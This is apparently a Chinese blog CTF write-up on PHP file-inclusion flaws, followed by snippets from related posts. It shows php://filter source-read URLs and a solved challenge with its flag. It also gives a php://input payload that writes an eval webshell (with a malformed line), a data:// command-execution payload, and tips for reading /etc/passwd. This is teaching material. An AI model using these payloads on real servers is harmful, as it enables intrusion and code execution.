【CTF题】使用文件包含漏洞读取网页代码

最新推荐文章于 2025-04-27 12:18:25 发布
最新推荐文章于 2025-04-27 12:18:25 发布
阅读量2.1w 收藏 29
点赞数 6
分类专栏: 网络安全 文章标签: php 漏洞 ctf 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/keysking/article/details/54728702
版权

【CTF题】使用文件包含漏洞读取网页代码

按照我的理解文件包含漏洞是指网页后端php(或其他)代码中使用了include等文件包含语句,而且所包含的文件由变量控制,恰恰此变量又能通过GET或POST等方式进行修改所造成的。

1.直接包含内有运行代码的文件

比如有一index.php

<?php
  include $_GET['file'];
?>

那么就可以通过抓包修改file值的办法去运行一些本来不该运行的文件

也可以通过此方法直接输出一些敏感的配置文件和远程包含shell(需要目标主机开启allow_url_fopen)

2.通过PHP内置协议直接读取代码

通过构造如下语句:

http://xxx.com/index.php?file=php://filter/read=convert.base64-encode/resource=xxx.php

就能获得xxx.php的代码的base64加密结果,通过base64解密后便可获得xxx.php的代码

题目是南邮网络攻防平台的文件包含题
这里写图片描述

点击“click me?no”以后:
这里写图片描述

可以看到,url变为了:

http://4.chinalover.sinaapp.com/web7/index.php?file=show.php

出现了?file=show.php

说明可能有文件包含漏洞,so,构建url如下:

http://4.chinalover.sinaapp.com/web7/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

得到了index.php的base64加密后的代码
这里写图片描述

base解密后得到代码:

<html>
    <title>asdf</title>

<?php
    error_reporting(0);
    if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag:nctf{edulcni_elif_lacol_si_siht}

?>
</html>

可以看到,flag就在这里~

3.写入php文件

使用如下url:

http://xxx.com/index.php?file=php://input

并且在http头里提交

<?fputs(fopen("shell.php","w"),"<?php eval($_post['xxx'];?>")?>

就能在index.php说在的目录下生成shell.php

未完待续

几道文件包含漏洞ctf 目解答
shatianyzg的博客
08-26 556
读取到一段字符串,去进行base64解码,在burpsuite中解码。用 cat /flag_20052查到flag。打开目提示flag in /flag。抓包在 repeater里修改包,重放。用php://filter协议去。访问php文件 发现有文件包含漏洞。...
文件包含ctf
qq_42812036的博客
10-14 2954
文件包含定义危险函数ctf文件包含PHP伪协议php://inputphp://filterdata://phar://zip://常见的敏感文件Windows 服务器敏感文件linux 服务器敏感文件 定义 在通过PHP函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外恩德文件,导致意外的文件泄露甚至恶意代码的注入。 严格来说文件包含算是代码注入的一种 危险函数 in...
BugkuCTF文件包含漏洞
Sandra_93的博客
10-17 1603
虽然是参考别人的,但是,为了增强下记忆力,顺便督促自己天天做,还是每天来一CTF吧。现阶段,Web.
ctf文件包含漏洞(一)
wlllllianqing的博客
10-06 2446
文件包含 开发人员将相同的函数写入单独的文件中,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含 文件包含漏洞 开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞 相关函数: include() include_once() require() require_once() (未完持续…) ...
CTF 中的 include(文件包含)
最新发布
yqya_的博客
04-27 378
ctf 中对于 include(文件包含) 的考察
文件包含漏洞 基础
weixin_50464560的博客
03-21 1368
CTF文件包含漏洞总结 0x01 什么是文件包含漏洞 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 0x02 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据allow_...
文件包含(CTF)
ing_end的博客
04-02 1万+
文件包含 留言 连接数据库 查看留言 连接数据库 登录 连接数据库 注册 连接数据库 代码的重复 留言 查看留言 连接数据库单独的文件 登录 注册 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含。 程序开发人员都希望代码更加灵活,所以通常会把被包含的文件设置为变量,来进行动态调用,但正是由于这种灵活性,从而导致客户端可以
CTF文件包含漏洞总结
热门推荐
Lethe's Blog
02-13 5万+
CTF文件包含漏洞总结 0x01 什么是文件包含漏洞 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 0x02 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据 allow_url_include=On(php5.2之后默认为Off) 规定是否...
文件包含————ctfhub之读取源文件
qq_45655564的博客
05-29 888
php://filter php://filter 读取代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。 PHP.ini: php://filter在双off的情况下也可以正常使用; allow_url_fopen :off/on allow_url_include:off/on 举例: http://127.0.0.1/cmd.php?file=php://filter/read=convert.base64-encode/resource=./cmd.php CT
ctfCTF理论考核及答案
07-05
content-Type检测可以通过修改数据包中的content-Type字段绕过,而00截断利用的是文件系统在遇到00时停止读取的特点。 5. **Linux文件权限**:在Linux中,"rw-"代表具有和写权限,但没有执行权限。正确答案是B。 ...
CTF文件包含漏洞——data伪协议 【详】
2302_79596028的博客
10-27 2892
本文详细介绍了在CTF比赛中关于文件包含漏洞的一种常用攻击方法——data伪协议
CTFHUB--RCE--文件包含
qq_75120258的博客
03-02 1083
有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。当它与包含函数结合时,php://filter经常会被当作代码呗执行,所以我们通常会对他进行BASE64编码。file=php://filter/resource=/flag 得到flag。php:// — 访问各个输入/输出流(I/O streams)data://text/plain 任意代码执行。zlib:// — 压缩流。
CTFDay9 文件包含漏洞
qq_53525138的博客
05-04 222
CTFDay9 文件包含漏洞 漏洞原理 文件包含漏洞:即file inclusion,意思是文件包含,是指服务器开启alloww_url_include、allow_url_fopen选项时,就可以通过phpinclude(),include_once(),require(),require_once() 函数利用url去动态包含文件,如果没有对文件来源进行严格审查,就会导致恶意文件被读取或者执行。 漏洞类型 本地文件包含(LFI):被包含文件在服务器本地,执行方式为下图左上角url 远程文件包含(R
CTF-文件包含(持续更新)
m0_74317362的博客
07-28 2174
任意文件包含漏洞处理方法和实例
ctf文件包含
2401_87493916的博客
12-20 1227
⽂件包含,通过PHP函数引⼊⽂件时,传⼊的⽂件名没有经过合理的验证,从⽽操作 了预想之外的⽂件,就可能导致意外的⽂件泄漏甚⾄恶意代码注⼊。产⽣的条件: 常⻅的包含,在之前做命令执⾏的时候也已经⽤过了 include() require() include_once() require_once() 此外,常⽤的还有之前在web37写的伪协议,这⾥再复制过来。
CTF文件包含
qq_45086218的博客
02-28 3395
文章目录php伪协议data伪协议日志文件session文件竞争死亡绕过base64编码绕过 本文以ctf.show网站目为例,总结ctf中的文件包含漏洞 php伪协议 ?file=php://filter/convert.base64-encode/resource=flag.php data伪协议 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= PD9waHAgc3lzdGVtKCdjYXQgZmxh
CTF—文件
YkingH的博客
07-08 1043
CTF文件包含 文件包含漏洞 定义:在通过php函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入 危险函数 include() include_once() require() require_once() 解思路 本地文件包含:直接读取目标机上的Flag文件 远程文件包含:指定第三方服务器上可运行的PHP木马,拿到webshell,查看flag文件 php.ini allow_url_fopen = on/off 允许ur
CG CTF WEB 文件包含
无限迭代中......
07-02 936
http://4.chinalover.sinaapp.com/web7/index.php 解: 文件包含漏洞的格式网址,通过php://filter读取index源码-->php://filter/read=convert.base64-encode/resource=index.php 参考文章:https://www.2cto.com/article/201311/2584...
ctf本地包括_文件包含CTF
weixin_39667041的博客
12-19 979
文件包含 1502、解方法:使用php://filter协议读取index文件。3、源码分析asdferror_reporting(0);if(!$_GET[file]){echo 'click me? no';}$file=$_GET['file'];if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||st...
ctf 文件包含
03-23
### CTF 文件包含漏洞利用技巧与解思路 #### 背景介绍 文件包含漏洞是一种常见的Web安全漏洞,通常发生在开发者未对输入参数进行严格校验的情况下。在CTF竞赛中,这种类型的目经常涉及本地文件包含(Local File Inclusion, LFI)和远程文件包含(Remote File Inclusion, RFI)。通过这些漏洞,攻击者可以读取服务器上的敏感文件或执行恶意代码。 #### 常见易受攻击的PHP函数 在PHP开发中,`require`, `require_once`, `include`, 和 `include_once` 是最容易引发文件包含漏洞的函数[^2]。当这些函数中的文件路径来源于用户可控的输入时,就可能被用来加载任意文件。 #### 利用技巧 1. **本地文件包含 (LFI)** 攻击者可以通过构造特定的URL来尝试读取系统上存在的文件。例如,在Linux系统下,可以尝试访问 `/etc/passwd` 或其他配置文件。如果目标站点存在过滤机制,则需要绕过这些限制。一种常见方法是使用NULL字节 (`%00`) 来截断字符串验证逻辑[^3]。 2. **伪协议的应用** PHP支持多种内置流封装器(stream wrappers),比如 `file://`, `php://filter`, `zip://` 等。其中特别需要注意的是 `php://input` 和 `php://filter` 的组合使用,它们允许动态生成数据并将其作为虚拟文件供程序调用[^4]。 3. **环境变量注入** Linux系统的特殊文件如 `/proc/self/environ` 可记录当前进程启动时所携带的所有环境变量信息。由于HTTP请求头字段会被映射至某些内部变量表项之中,因此我们能够借助篡改 User-Agent 字段的方式向上述位置嵌入自定义脚本片段,并最终实现反序列化或其他形式的危害行为。 #### 示例代码 以下是基于以上原理的一个简单演示案例: ```php <?php // 模拟脆弱点:直接将GET参数传给 include 函数 $file = $_GET['page']; include($file); ?> ``` 假设此页面地址为 http://example.com/vuln.php?page=home.txt ,那么只要替换掉 page 参数值即可触发相应操作。例如: - 访问http://example.com/vuln.php?page=/etc/passwd 尝试泄露操作系统账户列表; - 如果服务端开启了allow_url_include选项的话甚至可以直接指定外部链接完成更复杂的交互过程。 #### 防护措施建议 为了防止此类问的发生,应当采取如下策略之一或者综合运用多项手段加强防护力度: - 对所有来自客户端的数据都应实施严格的白名单匹配检查。 - 使用框架自带的安全组件替代原始语法结构编写业务逻辑部分。 - 定期审查源码质量以及部署后的运行状态是否存在异常情况发生。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值